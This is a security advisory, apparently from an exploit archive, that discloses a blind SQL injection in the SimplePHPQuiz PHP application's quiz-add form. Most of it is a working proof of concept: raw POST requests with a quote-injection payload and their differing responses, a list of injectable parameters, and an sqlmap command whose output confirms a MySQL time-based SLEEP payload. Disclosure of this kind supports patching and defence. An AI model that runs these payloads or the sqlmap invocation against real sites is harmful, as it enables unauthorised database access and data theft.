SimplePHPQuiz Blind SQL Injection

2016.08.25
Credit: HaHwul
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

# Exploit Title: SimplePHPQuiz - Blind SQL Injection # Date: 2016-08-23 # Exploit Author: HaHwul # Exploit Author Blog: www.hahwul.com # Vendor Homepage: https://github.com/valokafor/SimplePHPQuiz # Software Link: https://github.com/valokafor/SimplePHPQuiz/archive/master.zip # Version: [app version] (REQUIRED) # Version: Latest commit # Tested on: Debian [wheezy] ### Vulnerability 1-1. Nomal Request POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1 Host: 127.0.0.1 ..snip.. Content-Length: 96 question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit 1-2 Response <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer"> <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p> 2-1 Attack Request 1 POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1 Host: 127.0.0.1 ..snip.. Content-Length: 96 question=0000'&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit 2-2 Response <div class="container theme-showcase" role="main"><h1>System Error</h1> <div class="footer"> <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p> 3-1 Attack Request 2 POST /vul_test/SimplePHPQuiz/process_quizAdd.php HTTP/1.1 Host: 127.0.0.1 ..snip.. Content-Length: 96 question=0000''&correct_answer=9999&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit 3-2 Response <div class="container theme-showcase" role="main">Your quiz has been saved <div class="footer"> <p class="text-muted">&copy Val Okafor 2014 - Simple PHP Quiz</p> ### Weak Parameters correct_answer parameter question parameter wrong_answer1 parameter wrong_answer2 parameter wrong_answer3 parameter ### SQLMAP Result #> sqlm -u "http://127.0.0.1/vul_test/SimplePHPQuiz/process_quizAdd.php" --data="question=0000&correct_answer=99aaa99&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit" --risk 3 --dbs --no-cast -p correct_answer ...snip... POST parameter 'correct_answer' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection points with a total of 117 HTTP(s) requests: --- Parameter: correct_answer (POST) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind (SELECT) Payload: question=0000&correct_answer=99aaa99' AND (SELECT * FROM (SELECT(SLEEP(5)))FvVg) AND 'ZQRo'='ZQRo&wrong_answer1=9&wrong_answer2=9&wrong_answer3=9&submit=submit --- [17:52:05] [INFO] the back-end DBMS is MySQL web server operating system: Linux Ubuntu web application technology: Apache 2.4.10


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top